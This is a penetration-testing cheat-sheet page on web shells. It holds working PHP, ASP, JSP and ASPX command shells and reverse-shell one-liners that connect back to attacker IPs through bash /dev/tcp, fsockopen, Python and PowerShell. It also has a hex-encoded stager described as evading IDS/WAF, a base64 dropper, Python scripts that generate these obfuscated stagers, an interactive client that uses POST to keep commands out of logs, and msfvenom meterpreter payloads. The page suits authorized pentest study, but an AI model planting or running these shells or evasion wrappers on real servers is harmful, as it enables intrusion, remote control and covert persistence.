# Web Shell

## References

{% embed url="<https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/>" %}

{% embed url="<https://0xss0rz.github.io/2020-05-10-Oneliner-shells/>" %}

{% content-ref url="/pages/h0xVjlLW3ybTWHQI8Kct" %}
[Bind and Reverse Shell](/0xss0rz/pentest/shells/bind-and-reverse-shell.md)
{% endcontent-ref %}

{% embed url="<https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>" %}

## Tools

### One-Lin3r

{% embed url="<https://github.com/D4Vinci/One-Lin3r>" %}

```
pip install one-lin3r
```

<figure><img src="/files/CtnvZyep1b2iwppHzzEN" alt=""><figcaption></figcaption></figure>

### LazyShell

<figure><img src="/files/cynPpxdDlqklZd9ik6n3" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/aniqfakhrul/LazyShell>" %}

## Webroot

| Web Server | Default Webroot          |
| ---------- | ------------------------ |
| `Apache`   | `/var/www/html/`         |
| `Nginx`    | `/usr/local/nginx/html/` |
| `IIS`      | `C:\inetpub\wwwroot\`    |
| `XAMPP`    | `C:\xampp\htdocs\`       |

The Nginx path is the source-build default; distribution packages usually ship `/var/www/html/` (Debian/Ubuntu) or `/usr/share/nginx/html/`. Check `root` in the server's config (`nginx -T`, `apachectl -S`) when a file lands somewhere unexpected.

## Custom shells

### PHP

All three functions below work on Linux and Windows; they differ in how output comes back: `system()` prints it directly, `shell_exec()` returns the whole output as a string (so it has to be `echo`ed), and `exec()` returns only the last line unless an array is passed as its second argument.

#### Linux

```php
<?php system($_REQUEST['cmd']); ?>
```

```
http://SERVER_IP:PORT/uploads/shell.php?cmd=id
```

```php
<?php system($_GET['cmd']);?>

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
```

#### Windows

```php
<?php echo exec($_GET["cmd"]);?>
```

#### Reverse shell - Linux

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>
```

The `php -r` one-liners below assume the socket opened by `fsockopen()` lands on file descriptor 3; if the shell does not connect, try 4, 5 or 6 instead.

```
php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
```

```
php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
```

With Base64: the dropper below decodes an embedded base64 string and writes the result to `php1.php` in the same directory, so the uploaded file never contains the shell in cleartext. To reuse it, decode the string, change the IP and port in the decoded PHP, re-encode it and replace the argument of `base64_decode()`. (The original base64 string is not reproduced here.)

```php
<!DOCTYPE html><html><head><title>PHP Code with HTML</title></head><body><?php $tem1 = base64_decode("<BASE64_PAYLOAD>"); $file = fopen("php1.php", "w"); echo fwrite($file, $tem1); fclose($file); ?></body></html>
```

Ref: <https://x.com/bountywriteups/status/1844330355450331235?t=mPxG2Tz49KPkkRSK6fIoXA&s=03>

Or upload a simple command shell and send a reverse-shell one-liner through its `cmd` parameter, for example:

{% content-ref url="/pages/h0xVjlLW3ybTWHQI8Kct" %}
[Bind and Reverse Shell](/0xss0rz/pentest/shells/bind-and-reverse-shell.md)
{% endcontent-ref %}

* with python (Linux)

```
10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
```

* with powershell (Windows)

```
?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
```

### PHP - Bypass IDS / WAF

```php
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
```

Hex decode:

```php
if($x_=$_GET[0]){system($x_);}
```

Usage: `?0=id`. Only `eval` and `hex2bin` appear in cleartext, so signatures matching on `system` or `$_GET` miss the file; a `disable_functions` entry for `system()` still blocks it at runtime.
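Both the base64 dropper and the hex2bin stager above are encodings of a plain PHP body. The script below is an added example (not from the page or the linked write-up) that generates either wrapper from a body and decodes them back for auditing; the reverse-shell body and the `php1.php` output name are assumptions taken from the examples above.

```python
"""Generate the encoded PHP stagers shown above (hex2bin and base64 dropper).

Added example; not code from the page or from the linked write-up. The page
shows the finished artefacts; these helpers build them from a plain PHP body so
the IP, port or parameter name can be changed without hand-editing hex or
base64. The output file name and the reverse-shell body are assumptions.
"""
import base64
import binascii


def hex_stager(php_body):
    """<?=eval(hex2bin("..."))?>  The body is PHP code without <?php tags,
    which is what eval() expects. Only 'eval' and 'hex2bin' stay in cleartext."""
    return '<?=eval(hex2bin("%s"))?>' % binascii.hexlify(php_body.encode()).decode()


def decode_hex_stager(stager):
    """Recover the PHP body from a hex2bin stager (to audit or modify it)."""
    marker = 'hex2bin("'
    start = stager.index(marker) + len(marker)
    end = stager.index('"', start)
    return binascii.unhexlify(stager[start:end]).decode()


def php_reverse_shell(lhost, lport):
    """The bash /dev/tcp reverse shell from the section above, with IP/port filled in."""
    return f"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'\"); ?>"


def base64_dropper(shell_source, out_name="php1.php"):
    """HTML page that base64-decodes the embedded shell and writes it to out_name
    in the same directory (the dropper pattern above). Decoding happens at
    request time, so the uploaded file never contains the shell in cleartext."""
    b64 = base64.b64encode(shell_source.encode()).decode()
    return (
        "<!DOCTYPE html><html><head><title>PHP Code with HTML</title></head><body>"
        f'<?php $tem1 = base64_decode("{b64}"); $file = fopen("{out_name}", "w"); '
        "echo fwrite($file, $tem1); fclose($file); ?></body></html>"
    )


def decode_base64_dropper(html):
    """Recover the shell source embedded in a dropper."""
    marker = 'base64_decode("'
    start = html.index(marker) + len(marker)
    end = html.index('"', start)
    return base64.b64decode(html[start:end]).decode()


if __name__ == "__main__":
    # Reproduces the stager on the page exactly.
    print(hex_stager("if($x_=$_GET[0]){system($x_);}"))
    # Dropper that writes the /dev/tcp reverse shell to php1.php when visited.
    print(base64_dropper(php_reverse_shell("10.10.14.2", 1234)))
```

`hex_stager()` on the body `if($x_=$_GET[0]){system($x_);}` yields exactly the stager shown above, which is a quick way to confirm a blob before uploading it. Note that the dropper needs write access to its own directory; check the `fwrite()` byte count it echoes.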

### ASP

```asp
<% eval request('cmd') %>
```

### With msfvenom

```shell-session
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
```

## Webshells collection

{% embed url="<https://github.com/TheBinitGhimire/Web-Shells>" %}

## SecLists Webshells

```
ls /opt/seclists/Web-Shells/        
backdoor_list.txt  CFM  FuzzDB  JSP  laudanum-1.0  Magento  PHP  Vtiger  WordPress
```

## Laudanum repo

{% embed url="<https://github.com/jbarcia/Web-Shells/tree/master/laudanum>" %}

<figure><img src="/files/uuuGdNRosmC9VBhhjwTh" alt=""><figcaption></figcaption></figure>

```
cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .
```

* Modify the shell for use

<figure><img src="/files/Zebuz1B4Smyws1pz3iOe" alt=""><figcaption></figcaption></figure>

## PHP

```
[Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php

[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php 
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php
```

```php
<?php system($_REQUEST["cmd"]); ?>
```

```
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
```

`?cmd=id`

```shell-session
curl http://SERVER_IP:PORT/shell.php?cmd=id
```
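Driving a one-line shell with `curl` gets tedious once output needs cleaning or commands contain quotes. The client below is an added example (not code from the page or from any linked tool) that wraps the `?cmd=` shells above in a prompt loop, strips the `<pre>` wrapper of the `shell_exec` variant and can switch to POST; the shell URL is an assumption.

```python
"""Interactive client for a ?cmd= web shell.

Added example, not code from the page or from any linked tool. It drives the
one-line shells above (system($_REQUEST['cmd']) and the <pre> shell_exec
variant): each command is URL-encoded into the cmd parameter, the reply is
stripped of the <pre> wrapper, and POST can be used instead of GET so commands
do not land verbatim in the server's access log. The shell URL is an assumption.
"""
import re
import sys
import urllib.parse
import urllib.request

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def extract_output(body):
    """Command output from a response body: the <pre>...</pre> content when the
    shell wraps it, otherwise the body as-is, minus trailing newlines."""
    match = PRE_RE.search(body)
    text = match.group(1) if match else body
    return text.rstrip("\n")


def build_request(url, command, param="cmd", method="GET", user_agent="Mozilla/5.0"):
    """urlencode() form-encodes the command ('+' for spaces), which PHP decodes
    into $_GET/$_POST and therefore $_REQUEST. POST only works with shells that
    read $_REQUEST or $_POST, not with the $_GET-only variants."""
    data = urllib.parse.urlencode({param: command})
    headers = {"User-Agent": user_agent}
    if method == "GET":
        return urllib.request.Request(f"{url}?{data}", headers=headers)
    return urllib.request.Request(url, data=data.encode(), headers=headers, method="POST")


def run(url, command, method="GET", timeout=10):
    """Send one command and return its output."""
    req = build_request(url, command, method=method)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_output(resp.read().decode("utf-8", errors="replace"))


def main(argv):
    if len(argv) < 2:
        print(f"usage: {argv[0]} http://SERVER_IP:PORT/shell.php [GET|POST]")
        return 1
    url, method = argv[1], (argv[2] if len(argv) > 2 else "GET")
    while True:
        try:
            cmd = input("$ ")
        except EOFError:
            break
        if cmd.strip() in ("exit", "quit"):
            break
        print(run(url, cmd, method))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 client.py http://SERVER_IP:PORT/shell.php POST`. Each command still runs in a fresh process, so `cd` does not persist between prompts; chain with `cd /tmp && ls` or upgrade to a reverse shell once the foothold works.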

{% embed url="<https://github.com/duck-sec/webshell>" %}

### p0wny shell

{% hint style="success" %}
*Automates working around PHP function restrictions (on `system()`, etc.)*
{% endhint %}

Works on Linux and Windows.

{% embed url="<https://github.com/flozz/p0wny-shell>" %}

<figure><img src="/files/G7yGZNQwP6JeZeuOb64i" alt=""><figcaption><p>p0wny shell</p></figcaption></figure>

### PHPBash

{% embed url="<https://github.com/Arrexel/phpbash>" %}

<figure><img src="/files/awbpaUhZdisN8x4LJjnL" alt=""><figcaption></figcaption></figure>

### wwwolf's PHP web shell

<figure><img src="/files/Ng5rL99p5n9VPxn4IO7w" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/WhiteWinterWolf/wwwolf-php-webshell>" %}

### C99 Webshell

{% embed url="<https://github.com/cermmik/C99-WebShell>" %}

### PentestMonkey - Reverse shell

{% embed url="<https://github.com/pentestmonkey/php-reverse-shell>" %}

## JSP

```
[Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp

[Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp
```

```jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```

This one-liner runs the command but writes nothing back to the response, so use it blind (for example with a reverse-shell one-liner in `cmd`) or take one of the fuller `cmd.jsp` files listed above. Also note that `exec(String)` splits the string on whitespace without any shell quoting, so a command like `bash -c 'id; whoami'` will not be parsed the way a shell would; invoke a single binary with its arguments instead.

## ASP

```
[Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp 
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp
```

```asp
<% eval request("cmd") %>
```

{% embed url="<https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/newaspcmd.asp>" %}

## ASPX

```
[Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx

[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx
```

### Metasploit

```shell-session
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes
```

Catch the callback with `multi/handler`, using the same payload, LHOST and LPORT as the `msfvenom` command:

```shell-session
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:1337 
```

### [Laudanum repo](#laudanum-repo)

### Webshell9

{% embed url="<https://webshell9.com/>" %}

<figure><img src="/files/NgBm0kuIiQCcpO7TgnS7" alt=""><figcaption></figcaption></figure>

### Antak WebShell

{% embed url="<https://github.com/samratashok/nishang/tree/master/Antak-WebShell>" %}

Modify the shell for use

<figure><img src="/files/zwvxR2CEsNrhH8bCwyHO" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/MyChDPbTU0f1A1iwQESb" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9GziayYN1fRJSQ28mamI" alt=""><figcaption></figcaption></figure>

### SharPyShell - Tiny and obfuscated ASP.NET webshell

{% embed url="<https://github.com/antonioCoco/SharPyShell>" %}

```
python3 SharPyShell.py generate -p somepassword
```

```
python3 SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
```

{% embed url="<https://redteamrecipe.com/mastering-impact-with-sharpening-techniques>" %}

## WAR

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
```

```
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```

Catch the callback with `msf6 exploit(multi/handler)` (set the matching payload, LHOST and LPORT); both `java/jsp_shell_reverse_tcp` and `java/shell_reverse_tcp` are stageless, so a plain `nc -lvnp <LPORT>` listener works too.

{% embed url="<https://github.com/guinea-offensive-security/JSB0HELL?tab=readme-ov-file>" %}

## Tomcat (8080)

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat>" %}

{% embed url="<https://github.com/p0dalirius/Awesome-RCE-techniques/tree/master/Frameworks/Apache-Tomcat>" %}

{% embed url="<https://github.com/p0dalirius/Tomcat-webshell-application>" %}

{% embed url="<https://github.com/p0dalirius/Tomcat-webshell-application/releases/tag/1.3.0>" %}

## Shell ++

{% content-ref url="/pages/16bwEEpyWa92Oc6gtbya" %}
[TTY Upgrade](/0xss0rz/pentest/shells/tty-upgrade.md)
{% endcontent-ref %}
